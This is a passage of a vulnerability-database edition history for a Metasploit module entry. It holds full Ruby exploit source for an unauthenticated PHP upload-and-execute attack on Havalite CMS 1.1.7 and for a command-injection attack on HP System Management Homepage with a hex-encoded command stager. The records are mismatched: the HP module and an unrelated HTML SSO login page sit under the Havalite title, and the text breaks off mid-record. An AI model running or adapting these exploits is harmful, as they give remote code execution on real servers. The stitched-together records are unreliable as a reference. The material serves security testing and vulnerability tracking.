"cvelist": [], "lastseen": "2019-08-04T10:58:18", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 4.6, "vector": "NONE", "modified": "2019-08-04T10:58:18"}, "dependencies": {"references": [{"type": "debian", "idList": ["DEBIAN:DLA-1871-1:9568B", "DEBIAN:DLA-1870-1:FF601", "DEBIAN:DLA-1869-1:C14DF", "DEBIAN:DLA-1868-1:080D4", "DEBIAN:DLA-1867-1:C8700", "DEBIAN:DSA-4490-1:715F8", "DEBIAN:DLA-1866-1:D1352"]}, {"type": "mskb", "idList": ["KB4490496"]}, {"type": "gentoo", "idList": ["GLSA-201908-02", "GLSA-201908-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1824-1", "OPENSUSE-SU-2019:1826-1"]}, {"type": "slackware", "idList": ["SSA-2019-213-01"]}, {"type": "freebsd", "idList": ["6E65DFEA-B614-11E9-A3A2-1506E15611CC"]}, {"type": "ubuntu", "idList": ["USN-4069-2", "USN-4079-2", "USN-4085-1", "USN-4084-1"]}, {"type": "redhat", "idList": ["RHSA-2019:2004", "RHSA-2019:2003"]}], "modified": "2019-08-04T10:58:18"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-04T10:58:18", "differentElements": ["sourceData"], "edition": 88}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-04T13:15:51", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 1.8, "vector": "NONE", "modified": "2019-08-04T13:15:51"}, "dependencies": {"references": [{"type": "debian", "idList": ["DEBIAN:DLA-1871-1:9568B", "DEBIAN:DLA-1870-1:FF601", "DEBIAN:DLA-1869-1:C14DF", "DEBIAN:DLA-1868-1:080D4", "DEBIAN:DLA-1867-1:C8700", "DEBIAN:DSA-4490-1:715F8", "DEBIAN:DLA-1866-1:D1352"]}, {"type": "mskb", "idList": ["KB4490496"]}, {"type": "gentoo", "idList": ["GLSA-201908-02", "GLSA-201908-01"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1824-1", "OPENSUSE-SU-2019:1826-1"]}, {"type": "slackware", "idList": ["SSA-2019-213-01"]}, {"type": "freebsd", "idList": ["6E65DFEA-B614-11E9-A3A2-1506E15611CC"]}, {"type": "ubuntu", "idList": ["USN-4069-2", "USN-4079-2", "USN-4084-1", "USN-4085-1"]}, {"type": "redhat", "idList": ["RHSA-2019:2004", "RHSA-2019:2003"]}], "modified": "2019-08-04T13:15:51"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-04T13:15:51", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref"], "edition": 89}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "97ae27eee03061e4dfa692f21662901f", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a vulnerability found in HP System Management Homepage. By supplying a specially crafted HTTP request, it is possible to control the 'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc), which will be used in a exec() function.\n", "published": "2013-08-02T16:49:03", "modified": "2018-08-10T04:34:03", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3576"], "cvelist": ["CVE-2013-3576"], "lastseen": "2019-08-17T03:46:49", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 8.4, "vector": "NONE", "modified": "2019-08-17T03:46:49"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-3576"]}, {"type": "nessus", "idList": ["HPSMH_GINKGOSNMP_CMD_INJECTION.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:122122"]}, {"type": "cert", "idList": ["VU:735364"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/HP_SYS_MGMT_EXEC"]}, {"type": "zdt", "idList": ["1337DAY-ID-20920"]}, {"type": "d2", "idList": ["D2SEC_HPSMH"]}, {"type": "dsquare", "idList": ["E-327"]}, {"type": "saint", "idList": ["SAINT:E4A60C12A1AE83FE30F35A3A418E9AB0", "SAINT:C3842DE44E21FBDC4C958E705CCD66C5", "SAINT:37B3DD6AD0CD94D2447AAA5F4E09A4CE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310803846"]}, {"type": "exploitdb", "idList": ["EDB-ID:26420"]}], "modified": "2019-08-17T03:46:49"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/hp_sys_mgmt_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"HP System Management Homepage JustGetSNMPQueue Command Injection\",\n 'Description' => %q{\n This module exploits a vulnerability found in HP System Management Homepage. By\n supplying a specially crafted HTTP request, it is possible to control the\n 'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc),\n which will be used in a exec() function.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Markus Wulftange', # Discovery & multi-platform Metasploit module\n 'sinn3r' # initial Windows Metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2013-3576'],\n ['OSVDB', '94191'],\n ['US-CERT-VU', '735364']\n ],\n 'DefaultOptions' =>\n {\n 'SSL' => true\n },\n 'Platform' => %w{ linux win },\n 'Targets' =>\n [\n ['Linux', {\n 'Platform' => 'linux',\n 'Arch' => ARCH_X86,\n 'CmdStagerFlavor' => 'bourne'\n }],\n ['Linux (x64)', {\n 'Platform' => 'linux',\n 'Arch' => ARCH_X64,\n 'CmdStagerFlavor' => 'bourne'\n }],\n ['Windows', {\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'CmdStagerFlavor' => 'vbs'\n }],\n ['Windows (x64)', {\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'CmdStagerFlavor' => 'vbs'\n }],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 11 2013\"\n ))\n\n register_options(\n [\n Opt::RPORT(2381),\n # USERNAME/PASS may not be necessary, because the anonymous access is possible\n OptString.new(\"USERNAME\", [false, 'The username to authenticate as']),\n OptString.new(\"PASSWORD\", [false, 'The password to authenticate with'])\n ])\n end\n\n def post_auth?\n true\n end\n\n def check\n @cookie = ''\n\n sig = Rex::Text.rand_text_alpha(10)\n cmd = \"echo #{sig}&&whoami&&echo #{sig}\"\n\n res = send_command(cmd)\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n if res.code == 200 && res.body =~ /#{sig}/\n vprint_good(\"Running with user '#{res.body.split(sig)[1].strip}'\")\n return Exploit::CheckCode::Vulnerable\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n def login\n username = datastore['USERNAME']\n password = datastore['PASSWORD']\n\n cookie = ''\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => '/proxy/ssllogin',\n 'vars_post' => {\n 'redirecturl' => '',\n 'redirectquerystring' => '',\n 'user' => username,\n 'password' => password\n }\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Connection timed out during login\")\n end\n\n # CpqElm-Login: success\n if res.headers['CpqElm-Login'].to_s =~ /success/\n cookie = res.get_cookies.scan(/(Compaq\\-HMMD=[\\w\\-]+)/).flatten[0] || ''\n end\n\n cookie\n end\n\n\n def setup_stager\n execute_cmdstager(:temp => './', :linemax => 2800)\n end\n\n\n def execute_command(cmd, opts={})\n # Encodes command as sequence of hex values to be passed to the Perl/PHP\n # function `pack(\"N*\", ...)` that is then used in a `system(...)` call.\n\n # trailing bytes need to be handled separately\n rem = cmd.size % 4\n if rem != 0\n last_bytes = \".chr(#{cmd[-rem..-1].each_byte.map(&:ord).join(\").chr(\")})\"\n cmd = cmd[0...-rem]\n end\n\n # convert double words into hex representation\n dwords = cmd.each_byte.each_slice(4).map { |dw|\n sprintf(\"0x%x\", dw.pack(\"C*\").unpack(\"N\")[0])\n }\n\n # build final Perl/PHP code that is getting executed\n script_code = \"system(pack(chr(78).chr(42),#{dwords.join(\",\")})#{last_bytes});\"\n\n # build Perl/PHP invocation command\n case target.opts['Platform']\n # Perl for Linux as it's more likely to be in the PATH\n when \"linux\" then cmd = \"perl -e '#{script_code}'\"\n # PHP for Windows\n when \"win\" then cmd = \"php -r #{script_code}\"\n end\n\n res = send_command(cmd)\n if res && res.code != 200\n vprint_error(\"Unexpected response:\\n#{res}\")\n fail_with(Failure::Unknown, \"There was an unexpected response\")\n end\n end\n\n\n def send_command(cmd)\n if !datastore['USERNAME'].to_s.empty? && !datastore['PASSWORD'].to_s.empty? && @cookie.empty?\n @cookie = login\n if @cookie.empty?\n fail_with(Failure::NoAccess, \"#{peer} - Login failed\")\n else\n print_good(\"Logged in as '#{datastore['USERNAME']}'\")\n end\n end\n\n req_opts = {}\n req_opts['uri'] = generate_uri(cmd)\n unless @cookie.empty?\n browser_chk = 'HPSMH-browser-check=done for this session'\n curl_loc = \"curlocation-#{datastore['USERNAME']}=\"\n req_opts['cookie'] = \"#{@cookie}; #{browser_chk}; #{curl_loc}\"\n end\n\n send_request_raw(req_opts)\n end\n\n\n def generate_uri(cmd)\n \"#{normalize_uri(\"smhutil\",\"snmpchp/\")}&#{cmd.gsub(/ /, \"%20\")}&&echo\"\n end\n\n\n def exploit\n @cookie = ''\n\n setup_stager\n end\nend\n\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-17T03:46:49", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref"], "edition": 90}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-17T05:43:57", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 1.7, "vector": "NONE", "modified": "2019-08-17T05:43:57"}, "dependencies": {"references": [{"type": "centos", "idList": ["CESA-2019:2473", "CESA-2019:2471"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4502-1:2AB9C", "DEBIAN:DLA-1888-1:33F1E", "DEBIAN:DLA-1886-1:800E7", "DEBIAN:DLA-1887-1:DF214", "DEBIAN:DSA-4501-1:7A4C9"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1923-1", "OPENSUSE-SU-2019:1924-1", "OPENSUSE-SU-2019:1921-1", "OPENSUSE-SU-2019:1920-1"]}, {"type": "thn", "idList": ["THN:878061A73E138AD892EFFB4D6E6F0C11"]}, {"type": "mskb", "idList": ["KB4511872", "KB4512506"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-2462", "ELSA-2019-4747"]}, {"type": "ubuntu", "idList": ["USN-4101-1"]}, {"type": "gentoo", "idList": ["GLSA-201908-20"]}, {"type": "redhat", "idList": ["RHSA-2019:2512", "RHSA-2019:2511"]}], "modified": "2019-08-17T05:43:57"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-17T05:43:57", "differentElements": ["modified", "published", "sourceData"], "edition": 91}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "77438aaa45a282c6a259c51523c76be1", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-20T14:52:32", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 1.9, "vector": "NONE", "modified": "2019-08-20T14:52:32"}, "dependencies": {"references": [{"type": "thn", "idList": ["THN:1D88818C1C20ADD5C17298B9EB532324"]}, {"type": "ubuntu", "idList": ["USN-4105-1", "USN-4103-2", "USN-4078-2", "USN-4104-1", "USN-4102-1"]}, {"type": "mskb", "idList": ["KB4512482", "KB4512518", "KB4512491"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1959-1", "OPENSUSE-SU-2019:1954-1", "OPENSUSE-SU-2019:1952-1", "OPENSUSE-SU-2019:1951-1"]}, {"type": "redhat", "idList": ["RHSA-2019:2519"]}, {"type": "securelist", "idList": ["SECURELIST:4CA85687D57BCAE196E136B1708E2402", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-2002", "ELSA-2019-2511", "ELSA-2019-4756", "ELSA-2019-4753"]}], "modified": "2019-08-20T14:52:32"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n<html>\n\t<head>\n\t\t<title>sso login check</title>\n\t\t\n\t\t<meta charset=\"utf-8\"/>\n\t\t<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" />\n\t\t<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\n\t\t<meta http-equiv=\"CACHE-CONTROL\" content=\"NO-CACHE\" />\n\t\t<meta http-equiv=\"PRAGMA\" content=\"NO-CACHE\" />\n\t\t<meta http-equiv=\"EXPIRES\" content=\"0\" />\n\t</head>\n \t<body>\n \t<script src=\"http://127.0.0.1:12381/auth\" language=\"javascript\" type=\"text/javascript\"></script> \n\t\t<script language=\"javascript\" type=\"text/javascript\">\n\t\t\tfunction getOrigURLParamValue() \n\t\t\t{\n\t\t\t\tvar orig_url_param = 'orig_url=';\n\t\t\t\tvar decodedUrlParameters = decodeURIComponent(location.search);\n\t\t\t\tvar decodedOrigParam = (new RegExp(orig_url_param + '.*').exec(decodedUrlParameters)||[,\"\"])[0].replace(orig_url_param, '').replace(/\\+/g, '%20')||null;\n\t\t\t\tvar encodedOrigParam = encodeURIComponent(decodedOrigParam);\n\n\t\t\t\t//console.log('Decoded URL Params: ' + decodedUrlParameters);\n\t\t\t\t//console.log('decodedOrigParam: ' + decodedOrigParam);\n\t\t\t\t//console.log('encodedOrigParam: ' + encodedOrigParam);\n\n\t\t\t\treturn encodedOrigParam;\n\n\t\t\t}\n\n\t\t\tfunction empty(str)\n\t\t\t{\t\n\t\t\t\treturn !str || !/[^\\s]+/.test(str);\n\t\t\t}\n\t\t\t\n\t\t\tvar encodedOrigUrl = getOrigURLParamValue();\n\t\t\t\n\t\t\ttry\n\t\t\t{\n\t\t\t\tif(typeof(gCtchLogonInfo) !== 'undefined')\n\t\t\t\t{\t \t\n\t\t\t\t\tvar modified_redirect_url = \"https://\" + window.location.hostname +'/EUP/transparent_login/?orig_url=' + encodedOrigUrl + '&winUserId=' +gCtchLogonInfo.winUserId ;\n\t\t\t\t\tif (!empty(gCtchLogonInfo.orgName))\n\t\t\t\t\t{\n\t\t\t\t\t\tmodified_redirect_url = modified_redirect_url.concat(\"&orgName=\",gCtchLogonInfo.orgName);\n\t\t\t\t\t}\n\t\t\t\t\tif (!empty(gCtchLogonInfo.userName))\n\t\t\t\t\t{\n\t\t\t\t\t\tmodified_redirect_url = modified_redirect_url.concat(\"&userName=\",gCtchLogonInfo.userName);\n\t\t\t\t\t}\n\t\t\t\t\t\n\t\t\t\t\tdocument.location.href = modified_redirect_url;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tdocument.location.href = \"https://\" + window.location.hostname + '/EUP/login?orig_url=' + encodedOrigUrl;\n\t\t\t\t}\n\t\t\t}\n\t\t\tcatch(e)\n\t\t\t{\n\t\t\t\tdocument.location.href = \"https://\" + window.location.hostname + '/EUP/login?orig_url='+ encodedOrigUrl;\n\t\t\t}\n\t\t</script> \n\n\t</body> \n</html>\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-08-20T14:52:32", "differentElements": ["modified", "published", "sourceData"], "edition": 92}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "30559bcc32809ca21a6af9e4866fb960", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.\n", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-08-20T16:28:32", "history": [], "viewCount": 9, "enchantments": {"score": {"value": 1.7, "vector": "NONE", "modified": "2019-08-20T16:28:32"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:1965-1", "OPENSUSE-SU-2019:1963-1", "OPENSUSE-SU-2019:1968-1", "OPENSUSE-SU-2019:1964-1", "OPENSUSE-SU-2019:1959-1", "OPENSUSE-SU-2019:1954-1", "OPENSUSE-SU-2019:1952-1", "OPENSUSE-SU-2019:1951-1"]}, {"type": "thn", "idList": ["THN:1D88818C1C20ADD5C17298B9EB532324"]}, {"type": "ubuntu", "idList": ["USN-4105-1", "USN-4107-1", "USN-4106-1", "USN-4078-2"]}, {"type": "mskb", "idList": ["KB4512482", "KB4512518", "KB4512491"]}, {"type": "aix", "idList": ["NTP_ADVISORY12.ASC"]}, {"type": "redhat", "idList": ["RHSA-2019:2519"]}, {"type": "securelist", "idList": ["SECURELIST:4CA85687D57BCAE196E136B1708E2402", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4"]}], "modified": "2019-08-20T16:28:32"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: 